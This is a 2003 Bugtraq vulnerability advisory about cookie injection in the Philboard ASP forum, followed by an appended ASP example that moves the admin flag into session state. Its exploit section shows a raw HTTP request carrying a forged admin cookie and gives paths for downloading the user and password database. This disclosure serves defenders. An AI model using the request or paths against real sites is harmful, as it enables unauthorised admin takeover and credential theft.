Philboard Forum Vulnerability

aresu_at_bosen.net
Date: 05/29/03

    Date: Thu, 29 May 2003 15:48:45 +0700
    To: bugtraq@securityfocus.com
    
    

    Philboard Vulnerability

    Severity : High (possible to gain administrator/user access on the forum board)
    Systems Affected: Philboard up to v1.14
    Vendor URL: http://www.youngpip.com/philboard.asp
    Vuln Type : Cookie Injection
    Status : Vendor contacted; no fixed version is available (they did not
    respond)
    Author : AresU
    Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka,
    and All 1ndonesian Security Team (1st)
    #romance@centrin.net.id
    http://www.bosen.net/releases/

    Summary
    =======
    Philboard is a freeware forum application written as ASP scripts.
    The vulnerability is in the cookie management: almost every script is
    vulnerable to cookie injection. The cookies are "philboard_admin=True;" or
    "admin=True;"

    Acknowledgments
    ===============
    Vulnerability discovery and advisory by AresU

    Vendor Response
    ===============
    The vendor has been contacted and no fixed version is available (they did
    not respond).
    To fix the script, you must change every cookie command into a session command.

    Exploit Code
    ============
    1) Log in to the forum as administrator:
    Use telnet to open the target on port 80

    GET /board/philboard_admin.asp HTTP/1.0
    Host: target.com
    Cookie: philboard_admin=True;

    2) Download the database (users and passwords):
    Usually, the database can be found at, and downloaded from:
    http://www.target.com/database/philboard.mdb
    or
    http://www.target.com/forum/database/philboard.mdb

    -----------------------------------------------
    This mail sent through http://webmail.bosen.net
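
The fix the advisory recommends (keeping the admin flag in session state instead of a cookie), sketched in classic ASP as an added example. This is not Philboard's code: only the cookie name `philboard_admin` comes from the advisory, and the function names, the `login.asp` page and the `passwordOk` value are assumptions.

```asp
<%@ Language="VBScript" %>
<%
Option Explicit

' WEAK (the pattern the advisory describes): the admin flag is read from a
' cookie, so whatever value the client sends is trusted.
Function IsAdminFromCookie()
    IsAdminFromCookie = (Request.Cookies("philboard_admin") = "True")
End Function

' CORRECTED: the flag lives in server-side Session state. The client holds
' only the opaque ASP session ID cookie and cannot set the flag itself.
Function IsAdminFromSession()
    IsAdminFromSession = (Session("philboard_admin") = True)
End Function

' Called once by the login handler after the password has been verified.
' passwordOk is an assumed Boolean produced by that check.
Sub MarkAdminLoggedIn(passwordOk)
    If passwordOk Then
        Session("philboard_admin") = True
        ' Expire any legacy cookie so leftover code paths cannot honour it.
        Response.Cookies("philboard_admin") = ""
        Response.Cookies("philboard_admin").Expires = DateAdd("d", -1, Now())
    Else
        Session.Contents.Remove "philboard_admin"
    End If
End Sub

' Guard to place at the top of every admin page.
Sub RequireAdmin()
    If Not IsAdminFromSession() Then
        Response.Redirect "login.asp"   ' hypothetical login page name
    End If
End Sub

RequireAdmin
%>
```

Every script that still reads `Request.Cookies("philboard_admin")` or `Request.Cookies("admin")` for an access decision needs the same change, since the advisory states that almost all scripts share the flaw.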

